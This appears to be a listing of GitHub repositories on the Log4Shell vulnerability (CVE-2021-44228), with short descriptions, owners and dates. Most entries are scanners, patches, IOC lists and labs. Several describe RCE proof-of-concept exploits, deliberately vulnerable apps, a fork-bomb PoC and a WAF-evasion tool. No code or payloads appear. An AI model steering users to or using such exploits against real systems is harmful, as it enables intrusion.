A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).
Koupah 4 1 2021-12-13 View
inettgmbh/checkmk-log4j-scanner
Scans for Log4j versions effected by CVE-2021-44228
inettgmbh 4 1 2021-12-15 View
shamo0/CVE-2021-44228
log4shell (CVE-2021-44228) scanning tool
shamo0 4 1 2021-12-16 View
MrHarshvardhan/PY-Log4j-RCE-Scanner
Using this tool, you can scan for remote command execution vulnerability CVE-2021-44228 on Apache Log4j at multiple addr...
MrHarshvardhan 4 1 2023-06-29 View
saharNooby/log4j-vulnerability-patcher-agent
Fixes CVE-2021-44228 in log4j by patching JndiLookup class
saharNooby 3 2 2021-12-11 View
madCdan/JndiLookup
Some tools to help mitigating Apache Log4j 2 CVE-2021-44228
madCdan 3 2 2021-12-13 View
ubitech/cve-2021-44228-rce-poc
A Remote Code Execution PoC for Log4Shell (CVE-2021-44228)
ubitech 3 2 2021-12-15 View
mzlogin/CVE-2021-44228-Demo
Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP
mzlogin 2 3 2021-12-12 View
dotPY-hax/log4py
pythonic pure python RCE exploit for CVE-2021-44228 log4shell
dotPY-hax 2 3 2021-12-12 View
sourcegraph/log4j-cve-code-search-resources
Using code search to help fix/mitigate log4j CVE-2021-44228
sourcegraph 1 4 2021-12-13 View
nu11secur1ty/CVE-2021-44228-VULN-APP
nu11secur1ty 1 4 2021-12-17 View
dbzoo/log4j_scanner
Fast filesystem scanner for CVE-2021-44228
dbzoo 4 1 2021-12-15 View
TheInterception/Log4J-Simulation-Tool
Vulnerability analysis, patch management and exploitation tool forCVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104
TheInterception 4 1 2021-12-19 View
unlimitedsola/log4j2-rce-poc
A bare minimum proof-of-concept for Log4j2 JNDI RCE vulnerability (CVE-2021-44228/Log4Shell).
unlimitedsola 3 2 2021-12-12 View
ssl-user-en/Log4j-Scanner-Exploit
Script en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.
ssl-user-en 0 4 2021-12-22 View
Kadantte/CVE-2021-44228-poc
log4shell sample application (CVE-2021-44228)
Kadantte 0 4 2021-12-10 View
M1ngGod/CVE-2021-44228-Log4j-lookup-Rce
M1ngGod 4 0 2021-12-11 View
zzzz0317/log4j2-vulnerable-spring-app
CVE-2021-44228
zzzz0317 4 0 2021-12-11 View
Occamsec/log4j-checker
Bash and PowerShell scripts to scan a local filesystem for Log4j .jar files which could be vulnerable to CVE-2021-44228 ...
Occamsec 4 0 2021-12-13 View
michaelsanford/Log4Shell-Honeypot
Dockerized honeypot for CVE-2021-44228.
michaelsanford 4 0 2021-12-15 View
Kr0ff/CVE-2021-44228
Log4Shell Proof of Concept (CVE-2021-44228)
Kr0ff 4 0 2021-12-16 View
vorburger/Log4j_CVE-2021-44228
vorburger 3 1 2021-12-11 View
mss/log4shell-hotfix-side-effect
Test case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions
mss 3 1 2021-12-15 View
pmontesd/log4j-cve-2021-44228
Very simple Ansible playbook that scan filesystem for JAR files vulnerable to Log4Shell
pmontesd 3 1 2021-12-15 View
badb33f/Apache-Log4j-POC
Proof of Concept of apache log4j LDAP lookup vulnerability. CVE-2021-44228
badb33f 3 1 2021-12-22 View
KirkDJohnson/Wireshark
Downloaded a packet capture (.pcapng) file from malware-traffic-analysis.net which was an example of an attempted attack...
KirkDJohnson 3 1 2024-03-26 View
thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832
Log4J CVE-2021-44228 : Mitigation Cheat Sheet
thedevappsecguy 2 2 2021-12-13 View
avwolferen/Sitecore.Solr-log4j-mitigation
This repository contains a script that you can run on your (windows) machine to mitigate CVE-2021-44228
avwolferen 2 2 2021-12-13 View
VerveIndustrialProtection/CVE-2021-44228-Log4j
VerveIndustrialProtection 1 3 2021-12-15 View
codiobert/log4j-scanner
Check CVE-2021-44228 vulnerability
codiobert 3 1 2021-12-14 View
hotpotcookie/CVE-2021-44228-white-box
Log4j vulner testing environment based on CVE-2021-44228. It provide guidance to build the sample infrastructure and the...
hotpotcookie 3 1 2022-02-12 View
b-abderrahmane/CVE-2021-44228-playground
b-abderrahmane 2 2 2021-12-11 View
mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228
mkhazamipour 2 2 2021-12-11 View
george-petrakis/log4j-scanner-CVE-2021-44228
Simple tool for scanning entire directories for attempts of CVE-2021-44228
george-petrakis 2 1 2021-12-13 View
C00LN3T/Log4ShellAuditor
An autonomous reflective Go agent for full-cycle security auditing, WAF evasion, OOB LDAP verification, self-remediation...
C00LN3T 3 0 2026-05-31 View
kannthu/CVE-2021-44228-Apache-Log4j-Rce
kannthu 0 3 2021-12-16 View
kek-Sec/log4j-scanner-CVE-2021-44228
Simple tool for scanning entire directories for attempts of CVE-2021-44228
kek-Sec 2 1 2021-12-13 View
zlepper/CVE-2021-44228-Test-Server
A small server for verifing if a given java program is succeptibel to CVE-2021-44228
zlepper 3 0 2021-12-10 View
threatmonit/Log4j-IOCs
Public IOCs about log4j CVE-2021-44228
threatmonit 3 0 2021-12-13 View
Joefreedy/Log4j-Windows-Scanner
CVE-2021-44228 vulnerability in Apache Log4j library | Log4j vulnerability scanner on Windows machines.
Joefreedy 3 0 2021-12-16 View
Sma-Das/Log4j-PoC
An educational Proof of Concept for the Log4j Vulnerability (CVE-2021-44228) in Minecraft
Sma-Das 3 0 2023-03-14 View
tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment
Objective: Demonstrate the exploitation of the Log4Shell vulnerability (CVE-2021-44228) within a simulated banking appli...
tadash10 3 0 2024-06-09 View
1in9e/Apache-Log4j2-RCE
Apache Log4j2 RCE( CVE-2021-44228)验证环境
1in9e 2 1 2021-12-10 View
byteboycn/CVE-2021-44228-Apache-Log4j-Rce
byteboycn 2 1 2021-12-11 View
tasooshi/horrors-log4shell
A micro lab for CVE-2021-44228 (log4j)
tasooshi 2 1 2021-12-12 View
anuvindhs/how-to-check-patch-secure-log4j-CVE-2021-44228
A one-stop repo/ information hub for all log4j vulnerability-related information.
anuvindhs 2 1 2021-12-15 View
chandru-gunasekaran/log4j-fix-CVE-2021-44228
Windows Batch Scrip to Fix the log4j-issue-CVE-2021-44228
chandru-gunasekaran 2 1 2021-12-20 View
BabooPan/Log4Shell-CVE-2021-44228-Demo
Log4Shell Demo with AWS
BabooPan 2 1 2021-12-22 View
Vulnmachines/log4jshell_CVE-2021-44228
Log4jshell - CVE-2021-44228
Vulnmachines 2 1 2022-01-07 View
lathika-3006/Solar-exploiting-log-4j
This repository presents a comprehensive walkthrough of the Solar Exploiting Log4j room on TryHackMe, with a focus on un...
lathika-3006 2 1 2026-03-22 View
guardicode/CVE-2021-44228_IoCs
Known IoCs for log4j framework vulnerability
guardicode 0 3 2021-12-12 View
alexandreroman/cve-2021-44228-workaround-buildpack
Buildpack providing a workaround for CVE-2021-44228 (Log4j RCE exploit)
alexandreroman 3 0 2021-12-10 View
Contrast-Security-OSS/CVE-2021-44228
Professional Service scripts to aid in the identification of affected Java applications in TeamServer
Contrast-Security-OSS 0 2 2021-12-13 View
helsecert/CVE-2021-44228
helsecert 1 1 2021-12-13 View
aajuvonen/log4stdin
A Java application intentionally vulnerable to CVE-2021-44228
aajuvonen 0 2 2022-01-16 View
eurogig/jankybank
Simple Java Front and Back end with bad log4j version featuring CVE-2021-44228
eurogig 0 2 2022-08-25 View
binganao/Log4j2-RCE
Log4j2 CVE-2021-44228 复现和回显利用
binganao 2 0 2021-12-11 View
jeffbryner/log4j-docker-vaccine
docker compose solution to run a vaccine environment for the log4j2 vulnerability CVE-2021-44228
jeffbryner 2 0 2021-12-11 View
ph0lk3r/anti-jndi
Fun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers.
ph0lk3r 2 0 2021-12-13 View
jeffli1024/log4j-rce-test
CVE-2021-44228 - Apache log4j RCE quick test
jeffli1024 2 0 2021-12-13 View
taurusxin/CVE-2021-44228
taurusxin 2 0 2021-12-13 View
alpacamybags118/log4j-cve-2021-44228-sample
Sample docker-compose setup to show how this exploit works
alpacamybags118 2 0 2021-12-14 View
VinniMarcon/Log4j-Updater
Log4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228
VinniMarcon 2 0 2021-12-15 View
alenazi90/log4j
An automated header extensive scanner for detecting log4j RCE CVE-2021-44228
alenazi90 2 0 2021-12-15 View
Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228
Script - Workaround instructions to address CVE-2021-44228 in vCenter Server
Fazmin 2 0 2021-12-17 View
spasam/log4j2-exploit
log4j2 Log4Shell CVE-2021-44228 proof of concept
spasam 2 0 2021-12-20 View
julian911015/Log4j-Scanner-Exploit
Script en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.
julian911015 2 0 2021-12-20 View
dcm2406/CVE-Lab
Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604
dcm2406 2 0 2023-12-07 View
lhotari/pulsar-docker-images-patch-CVE-2021-44228
Patch Pulsar Docker images with Log4J 2.17.1 update to mitigate Apache Log4J Security Vulnerabilities including Log4Shel...
lhotari 1 1 2021-12-10 View
cado-security/log4shell
Content to help the community responding to the Log4j Vulnerability Log4Shell CVE-2021-44228
cado-security 1 1 2021-12-11 View
halibobor/log4j2
CVE-2021-44228
halibobor 1 1 2021-12-13 View
gcmurphy/chk_log4j
Some siimple checks to see if JAR file is vulnerable to CVE-2021-44228
gcmurphy 1 1 2021-12-14 View
guerzon/log4shellpoc
Simple Spring Boot application vulnerable to CVE-2021-44228 (a.k.a log4shell)
guerzon 1 1 2021-12-14 View
Aschen/log4j-patched
Provide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it your...
Aschen 1 1 2021-12-17 View
trickyearlobe/inspec-log4j
An Inspec profile to check for Log4j CVE-2021-44228 and CVE-2021-45046
trickyearlobe 1 1 2021-12-19 View
srcporter/CVE-2021-44228
DO NOT USE FOR ANYTHING REAL. Simple springboot sample app with vulnerability CVE-2021-44228 aka "Log4Shell"
srcporter 1 1 2022-11-08 View
demonrvm/Log4ShellRemediation
A vulnerable Spring Boot application that uses log4j and is vulnerable to CVE-2021-44228, CVE-2021-44832, CVE-2021-45046...
demonrvm 1 1 2023-04-02 View
kossatzd/log4j-CVE-2021-44228-test
demo project to highlight how to execute the log4j (CVE-2021-44228) vulnerability
kossatzd 0 2 2021-12-13 View
chilit-nl/log4shell-example
The goal of this project is to demonstrate the log4j cve-2021-44228 exploit vulnerability in a spring-boot setup, and to...
chilit-nl 0 2 2021-12-13 View
dark-ninja10/Log4j-CVE-2021-44228
On Thursday (December 9th), a 0-day exploit in the popular Java logging library log4j (version 2) was discovered that re...
dark-ninja10 0 2 2021-12-14 View
34zY/JNDI-Exploit-1.2-log4shell
Details : CVE-2021-44228
34zY 0 2 2021-12-14 View
horrister/log4shell-cve-2021-44228
horrister 1 0 2026-06-04 View
MeterianHQ/log4j-vuln-coverage-check
A simple project to check coverage of Log4J vuln CVE-2021-44228 (and related)
MeterianHQ 0 1 2021-12-15 View
Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE
PoC RCE Log4j CVE-2021-4428 para pruebas
Grupo-Kapa-7 0 1 2021-12-17 View
axelcurmi/log4shell-docker-lab
Log4Shell (CVE-2021-44228) docker lab
axelcurmi 0 1 2021-12-18 View
recanavar/vuln_spring_log4j2
Simple Vulnerable Spring Boot Application to Test the CVE-2021-44228
recanavar 0 1 2021-12-16 View
wajda/log4shell-test-exploit
Test exploit of CVE-2021-44228
wajda 0 1 2021-12-17 View
dmitsuo/log4shell-war-fixer
Shell script to remove JndiLookup class from Log4J 2 jar file, inside WAR file, in order to mitigate CVE-2021-44228, a.k...
dmitsuo 1 0 2021-12-20 View
LucasPDiniz/CVE-2021-44228
Log4j Vulnerability RCE - CVE-2021-44228
LucasPDiniz 0 1 2023-11-13 View
felixslama/log4shell-minecraft-demo
Log4Shell (CVE-2021-44228) minecraft demo. Used for education fairs
felixslama 0 1 2023-11-21 View
Super-Binary/cve-2021-44228
这是安徽大学 “漏洞分析实验”(大三秋冬)期中作业归档。完整文档位于https://testgames.me/2024/11/10/cve-2021-44228/
Super-Binary 0 1 2024-11-15 View
moften/Log4Shell
Log4Shell CVE-2021-44228 PoC
moften 0 1 2025-09-09 View
manishkanyal/log4j-scanner
A Log4j vulnerability scanner is used to identify the CVE-2021-44228 and CVE_2021_45046
manishkanyal 1 0 2022-04-17 View
sebiboga/jmeter-fix-cve-2021-44228-windows
fix cve 44228 for windows
sebiboga 0 1 2021-12-15 View
uint0/cve-2021-44228--spring-hibernate
CVE-2021-44228 POC - Spring / Hibernate
uint0 1 0 2021-12-11 View
chilliwebs/CVE-2021-44228_Example
chilliwebs 1 0 2021-12-11 View
DiCanio/CVE-2021-44228-docker-example
DiCanio 1 0 2021-12-12 View
RrUZi/Awesome-CVE-2021-44228
An awesome curated list of repos for CVE-2021-44228. ``Apache Log4j 2``
RrUZi 1 0 2021-12-12 View
kali-dass/CVE-2021-44228-log4Shell
Sample log4j shell exploit
kali-dass 1 0 2021-12-12 View
pravin-pp/log4j2-CVE-2021-44228
pravin-pp 1 0 2021-12-12 View
Panyaprach/Prove-CVE-2021-44228
Panyaprach 1 0 2021-12-12 View
kimobu/cve-2021-44228
Some files for red team/blue team investigations into CVE-2021-44228
kimobu 1 0 2021-12-13 View
JiuBanSec/Log4j-CVE-2021-44228
Log4j Remote Code Injection (Apache Log4j 2.x < 2.15.0-rc2)
JiuBanSec 1 0 2021-12-13 View
p3dr16k/log4j-1.2.15-mod
log4j version 1 with a patch for CVE-2021-44228 vulnerability
p3dr16k 1 0 2021-12-13 View
Woahd/log4j-urlscanner
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithr...
Woahd 1 0 2021-12-14 View
rgl/log4j-log4shell-playground
A playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations
rgl 1 0 2021-12-15 View
dpomnean/log4j_scanner_wrapper
log4j vulnerability wrapper scanner for CVE-2021-44228
dpomnean 1 0 2021-12-16 View
andalik/log4j-filescan
Scanner recursivo de arquivos desenvolvido em Python 3 para localização e varredura de versões vulneráveis do Log4j2, co...
andalik 1 0 2021-12-16 View
gyaansastra/CVE-2021-44228
Log4Shell CVE-2021-44228 Vulnerability Scanner and POC
gyaansastra 1 0 2021-12-16 View
kal1gh0st/MyLog4Shell
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multith...
kal1gh0st 1 0 2021-12-16 View
Apipia/log4j-pcap-activity
A fun activity using a packet capture file from the log4j exploit (CVE-2021-44228)
Apipia 1 0 2021-12-18 View
Rk-000/Log4j_scan_Advance
A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228
Rk-000 1 0 2021-12-19 View
mn-io/log4j-spring-vuln-poc
POC for CVE-2021-44228 within Springboot
mn-io 1 0 2021-12-21 View
MarceloLeite2604/log4j-vulnerability
Presents how to exploit CVE-2021-44228 vulnerability.
MarceloLeite2604 1 0 2021-12-30 View
TPower2112/Writing-Sample-1
CVE-2021-44228 Log4j Summary
TPower2112 1 0 2022-04-30 View
moshuum/tf-log4j-aws-poc
This project files demostrate a proof-of-concept of log4j vulnerability (CVE-2021-44228) on AWS using Terraform Infrastr...
moshuum 1 0 2022-06-07 View
jaehnri/CVE-2021-44228
Proof of concept of the Log4Shell vulnerability (CVE-2021-44228)
jaehnri 1 0 2022-06-08 View
bcdunbar/CVE-2021-44228-poc
CVE-2021-44228 POC / Example
bcdunbar 1 0 2022-09-21 View
pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC
CVE 2021-44228 Proof-of-Concept. Log4Shell is an attack against Servers that uses vulnerable versions of Log4J.
pierpaolosestito-dev 1 0 2023-02-08 View
Hoanle396/CVE-2021-44228-demo
Hoanle396 1 0 2024-05-28 View
Carlos-Mesquita/TPASLog4ShellPoC
Proof of Concept for the Log4Shell vulnerability (CVE-2021-44228), developed as part of the coursework for the curricula...
Carlos-Mesquita 1 0 2024-10-08 View
qw3rtyou/CVE-2021-44228_dockernize
qw3rtyou 1 0 2025-02-04 View
danieljosmariyan7254/TryHackMe-Solar-exploiting-log4j-
Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun.
danieljosmariyan7254 1 0 2026-03-26 View
leetxyz/CVE-2021-44228-Advisories
List of company advisories log4j
leetxyz 0 1 2021-12-11 View
WYSIIWYG/Log4J_0day_RCE
Log4j-RCE (CVE-2021-44228) Proof of Concept
WYSIIWYG 0 1 2021-12-11 View
tuyenee/Log4shell
A lab for playing around with the Log4J CVE-2021-44228
tuyenee 0 1 2021-12-13 View
izzyacademy/log4shell-mitigation
Mitigation for Log4Shell Security Vulnerability CVE-2021-44228
izzyacademy 0 1 2021-12-10 View
sandarenu/log4j2-issue-check
Demo project to evaluate Log4j2 Vulnerability | CVE-2021-44228
sandarenu 0 1 2021-12-14 View
DAADAISMYLIFE/log4shell-lab
Log4Shell (CVE-2021-44228) 보안 실습 환경 - Log4j 2.14.1 취약 로그 수집 서버
DAADAISMYLIFE 0 0 2026-06-17 View
limxuan/ehir-vuln-enterprise-login
webapp vulnerable to CVE-2021-44228
limxuan 0 0 2026-06-15 View
sqsec/log4j2_CVE-2021-44228
sqsec 0 0 2022-12-30 View
hmxh123/Log4Shell-Vulnerability-Replication
CVE-2021-44228 漏洞复现完整记录(含环境搭建、触发验证)
hmxh123 0 0 2026-06-09 View
vutiendat323/CVE-2021-44228_Log4Shell
vutiendat323 0 0 2026-05-12 View
bhimsekhar/vulnerable-java-app
Spring Boot app with log4j 2.14.1 (CVE-2021-44228) — VulnFix agent test target
bhimsekhar 0 0 2026-06-03 View
jomjosh17/Log4Shell-CVE-2021-44228-
jomjosh17 0 0 2026-05-30 View
zoubir-sahnoun/log4shell-poc-maven
Intentionally vulnerable Maven project — CVE-2021-44228 (Log4Shell) SCA demo target
zoubir-sahnoun 0 0 2026-05-26 View
felisha-elmer/Sandbox-Challenge-Log4Shell-CVE-2021-44228-
felisha-elmer 0 0 2026-05-23 View
MAFO-sec/mi-laboratorio-log4shell
Laboratorio automatizado Plug & Play en Docker para auditar y estudiar la vulnerabilidad Log4Shell (CVE-2021-44228)
MAFO-sec 0 0 2026-05-18 View
aaronm-sysdig/log4j-vuln-demo
Intentionally vulnerable Log4j 2.14.1 demo for Sysdig CNAPP scanning (CVE-2021-44228)
aaronm-sysdig 0 0 2026-05-16 View
vutiendat323/log4Shell-CVE-2021-44228
vutiendat323 0 0 2026-05-12 View
FacundoMfernandez/pentesting-obioba
Pentesting caja negra: Shellshock (CVE-2014-6271) + Log4Shell (CVE-2021-44228). Escalada a root. Informe ejecutivo y téc...
FacundoMfernandez 0 0 2026-05-05 View
neilc1964techned/craready-test-java-vulns
CRAReady SBOM test fixture — Java/Maven app with Log4Shell (CVE-2021-44228), Spring4Shell, Text4Shell, and other critica...
neilc1964techned 0 0 2026-05-02 View
sajanapamuditha/Cyber-Attack-Simulation-
Log4Shell (CVE-2021-44228)
sajanapamuditha 0 0 2026-05-02 View
tieupham267/log4shell-coraza
Log4Shell (CVE-2021-44228) defense lab — nginx + Coraza WAF dynamic module + OWASP CRS v4. Educational use only.
tieupham267 0 0 2026-04-28 View
kaleth4/CVE-2021-44228
kaleth4 0 0 2026-04-27 View
pinaraltinok/Log4Shell-Attack
Multi-Stage Attack Modeling and Detection of Log4Shell for CVE-2021-44228
pinaraltinok 0 0 2026-04-22 View
PoC
- 0 0 - View
davindersingh74569-lang/HTB-Unified-Writeup
A technical walkthrough of exploiting CVE-2021-44228 (Log4Shell) in a UniFi Network Application environment, including M...
davindersingh74569-lang 0 0 2026-04-19 View
jdormannn/SecureOps-Lab
Performed a live cybersecurity assessment on a university Linux server. During analysis, active attack activity was iden...
jdormannn 0 0 2026-04-09 View
joaovicdev/EXPLOIT-CVE-2021-44228
PoC of CVE-2021-44228
joaovicdev 0 0 2026-04-10 View
nikolas-charalambidis/cve-2021-44228
A simple simulation of the infamous CVE-2021-44228 issue.
nikolas-charalambidis 0 0 2021-12-17 View
municipalparkingservices/CVE-2021-44228-Scanner
municipalparkingservices 0 0 2021-12-14 View
0xThiebaut/CVE-2021-44228
CVE-2021-44228 Response Scripts
0xThiebaut 0 0 2021-12-14 View
bhprin/log4j-vul
This project is just to show Apache Log4j2 Vulnerability - aka CVE-2021-44228
bhprin 0 0 2021-12-15 View
avirahul007/CVE-2021-44228
avirahul007 0 0 2021-12-15 View
jyotisahu98/logpresso-CVE-2021-44228-Scanner
Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228
jyotisahu98 0 0 2021-12-15 View
honeynet/log4shell-data
Data we are receiving from our honeypots about CVE-2021-44228
honeynet 0 0 2021-12-15 View
b1tm0n3r/CVE-2021-44228
CVE-2021-44228 demo webapp
b1tm0n3r 0 0 2021-12-15 View
lonecloud/CVE-2021-44228-Apache-Log4j
CVE-2021-44228-Apache-Log4j
lonecloud 0 0 2021-12-16 View
axisops/CVE-2021-44228
log4j mitigation work
axisops 0 0 2021-12-16 View
hozyx/log4shell
Applications that are vulnerable to the log4j CVE-2021-44228/45046 issue may be detectable by scanning jar, war, ear, zi...
hozyx 0 0 2021-12-16 View
andypitcher/Log4J_checker
Log4J checker for Apache CVE-2021-44228
andypitcher 0 0 2021-12-16 View
Vulnmachines/log4j-cve-2021-44228
Vulnmachines 0 0 2021-12-16 View
sysadmin0815/Fix-Log4j-PowershellScript
Log4Shell mitigation (CVE-2021-44228) - search and remove JNDI class from *log4j*.jar files on the system with Powershel...
sysadmin0815 0 0 2021-12-17 View
RenYuH/log4j-lookups-vulnerability
Log4j2 Vulnerability (CVE-2021-44228)
RenYuH 0 0 2021-12-17 View
scheibling/py-log4shellscanner
Scanner for the Log4j vulnerability dubbed Log4Shell (CVE-2021-44228)
scheibling 0 0 2021-12-17 View
zaneef/CVE-2021-44228
Log4Shell (CVE-2021-44228): Descrizione, Exploitation e Mitigazione
zaneef 0 0 2021-12-17 View
metodidavidovic/log4j-quick-scan
Scan your IP network and determine hosts with possible CVE-2021-44228 vulnerability in log4j library.
metodidavidovic 0 0 2021-12-17 View
WatchGuard-Threat-Lab/log4shell-iocs
A collection of IOCs for CVE-2021-44228 also known as Log4Shell
WatchGuard-Threat-Lab 0 0 2021-12-17 View
m0rath/detect-log4j-exploitable
CVE-2021-44228
m0rath 0 0 2021-12-17 View
DANSI/PowerShell-Log4J-Scanner
can find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046
DANSI 0 0 2021-12-18 View
suniastar/scan-log4shell
A scanning suite to find servers affected by the log4shell flaw (CVE-2021-44228) with example to test it
suniastar 0 0 2021-12-18 View
shivakumarjayaraman/log4jvulnerability-CVE-2021-44228
An attempt to understand the log4j vulnerability by looking through the code
shivakumarjayaraman 0 0 2021-12-18 View
otaviokr/log4j-2021-vulnerability-study
This is a showcase how the Log4J vulnerability (CVE-2021-44228) could be explored. This code is safe to run, but underst...
otaviokr 0 0 2021-12-18 View
kkyehit/log4j_CVE-2021-44228
kkyehit 0 0 2021-12-19 View
TotallyNotAHaxxer/f-for-java
a project written in go and java i abandoned for CVE-2021-44228 try to fix it if you can XD
TotallyNotAHaxxer 0 0 2021-12-20 View
xx-zhang/apache-log4j2-CVE-2021-44228
相关的复现和文档
xx-zhang 0 0 2021-12-21 View
r00thunter/Log4Shell-Scanner
Python script to detect Log4Shell Vulnerability CVE-2021-44228
r00thunter 0 0 2021-12-21 View
rejupillai/log4j2-hack-springboot
Log4j2 CVE-2021-44228 hack demo for a springboot app
rejupillai 0 0 2021-12-21 View
BJLIYANLIANG/log4j-scanner
Log4j 2 (CVE-2021-44228) vulnerability scanner for Windows OS
BJLIYANLIANG 0 0 2021-12-22 View
grimch/log4j-CVE-2021-44228-workaround
general purpose workaround for the log4j CVE-2021-44228 vulnerability
grimch 0 0 2021-12-24 View
Toolsec/log4j-scan
CVE-2021-44228 检查工具
Toolsec 0 0 2021-12-24 View
bsigouin/log4shell-vulnerable-app
Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.
bsigouin 0 0 2021-12-24 View
j3kz/CVE-2021-44228-PoC
Self-contained lab environment that runs the exploit safely, all from docker compose
j3kz 0 0 2021-12-18 View
Nikolas-Charalambidis/cve-2021-44228
A simple simulation of the infamous CVE-2021-44228 issue.
Nikolas-Charalambidis 0 0 2021-12-17 View
snatalius/log4j2-CVE-2021-44228-poc-local
Just a personal proof of concept of CVE-2021-44228 on log4j2
snatalius 0 0 2021-12-13 View
didoatanasov/cve-2021-44228
didoatanasov 0 0 2021-12-14 View
wheezysec/CVE-2021-44228-kusto
wheezysec 0 0 2021-12-10 View
roticagas/CVE-2021-44228-Demo
roticagas 0 0 2021-12-14 View
bumheehan/cve-2021-44228-log4j-test
bumheehan 0 0 2021-12-20 View
intel-xeon/CVE-2021-44228---detection-with-PowerShell
intel-xeon 0 0 2021-12-20 View
rv4l3r3/log4v-vuln-check
This script is used to perform a fast check if your server is possibly affected by CVE-2021-44228 (the log4j vulnerabili...
rv4l3r3 0 0 2021-12-16 View
xungzzz/VTI-IOCs-CVE-2021-44228
IOCs for CVE-2021-44228
xungzzz 0 0 2021-12-27 View
LinkMJB/log4shell_scanner
Quick and dirty scanner, hitting common ports looking for Log4Shell (CVE-2021-44228) vulnerability
LinkMJB 0 0 2021-12-27 View
IAmNewbieZ/CVE-2021-44228
IAmNewbieZ 0 0 2022-02-04 View
ToxicEnvelope/XSYS-Log4J2Shell-Ex
this repository contains a POC of CVE-2021-44228 (log4j2shell) as part of a security research
ToxicEnvelope 0 0 2021-12-25 View
felipe8398/ModSec-log4j2
Regra ModSec para proteção log4j2 - CVE-2021-44228
felipe8398 0 0 2021-12-27 View
c3-h2/Log4j_Attacker_IPList
CVE-2021-44228
c3-h2 0 0 2021-12-27 View
mazhar-hassan/log4j-vulnerability
Log4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4j
mazhar-hassan 0 0 2021-12-27 View
s-retlaw/l4s_poc
Log4Shell (Cve-2021-44228) Proof Of Concept
s-retlaw 0 0 2021-12-27 View
Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main
Ravid-CheckMarx 0 0 2021-12-27 View
uint0/cve-2021-44228-helpers
uint0 0 0 2021-12-12 View
jeremyrsellars/CVE-2021-44228_scanner
Aims to find JndiLookup.class in nearly any directory or zip, jar, ear, war file, even deeply nested.
jeremyrsellars 0 0 2021-12-15 View
PoneyClairDeLune/LogJackFix
A spigot plugin to fix CVE-2021-44228 Log4j remote code execution vulnerability, to protect Minecraft clients.
PoneyClairDeLune 0 0 2021-12-28 View
romanutti/log4shell-vulnerable-app
This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, known as log4shell.
romanutti 0 0 2021-12-31 View
mklinkj/log4j2-test
Log4j2 LDAP 취약점 테스트 (CVE-2021-44228)
mklinkj 0 0 2022-01-03 View
alexpena5635/CVE-2021-44228_scanner-main-Modified-
alexpena5635 0 0 2022-01-05 View
s-retlaw/l4srs
Rust implementation of the Log 4 Shell (log 4 j - CVE-2021-44228)
s-retlaw 0 0 2022-02-16 View
Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228
Willian-2-0-0-1 0 0 2022-05-02 View
Phineas09/CVE-2021-44228
Log4Shell Proof-Of-Concept derived from https://github.com/kozmer/log4j-shell-poc
Phineas09 0 0 2022-05-13 View
yuuki1967/CVE-2021-44228-Apache-Log4j-Rce
yuuki1967 0 0 2022-05-25 View
ra890927/Log4Shell-CVE-2021-44228-Demo
Log4Shell CVE-2021-44228 Demo
ra890927 0 0 2022-06-12 View
vino-theva/CVE-2021-44228
Apache Log4j is a logging tool written in Java. This paper focuses on what is Log4j and log4shell vulnerability and how...
vino-theva 0 0 2022-08-02 View
tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228
tharindudh 0 0 2022-08-18 View
digital-dev/Log4j-CVE-2021-44228-Remediation
This powershell script is intended to be used by anyone looking to remediate the Log4j Vulnerability within their enviro...
digital-dev 0 0 2022-09-08 View
ocastel/log4j-shell-poc
A Proof-Of-Concept for the CVE-2021-44228 vulnerability.
ocastel 0 0 2022-09-21 View
Sumitpathania03/LOG4J-CVE-2021-44228
Sumitpathania03 0 0 2023-02-22 View
53buahapel/log4shell-vulnweb
this web is vulnerable against CVE-2021-44228
53buahapel 0 0 2023-03-20 View
funcid/log4j-exploit-fork-bomb
💣💥💀 Proof of Concept: пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2021-44228
funcid 0 0 2023-04-15 View
Muhammad-Ali007/Log4j_CVE-2021-44228
Muhammad-Ali007 0 0 2023-07-19 View
roshanshibu/Odysseus
A demo of the Log4Shell (CVE-2021-44228) vulnerability.
roshanshibu 0 0 2023-10-25 View
ShlomiRex/log4shell_lab
CVE-2021-44228
ShlomiRex 0 0 2023-11-30 View
scabench/l4j-tp1
jee web project with log4shell (CVE-2021-44228) vulnerability
scabench 0 0 2023-12-18 View
dbwlsdnr95/CVE-2021-44228
dbwlsdnr95 0 0 2025-12-20 View
scabench/l4j-fp1
jee web project with sanitised log4shell (CVE-2021-44228) vulnerability
scabench 0 0 2023-12-27 View
KtokKawu/l4s-vulnapp
This is a potentially vulnerable Java web application containing Log4j affected by log4shell(CVE-2021-44228).
KtokKawu 0 0 2024-03-15 View
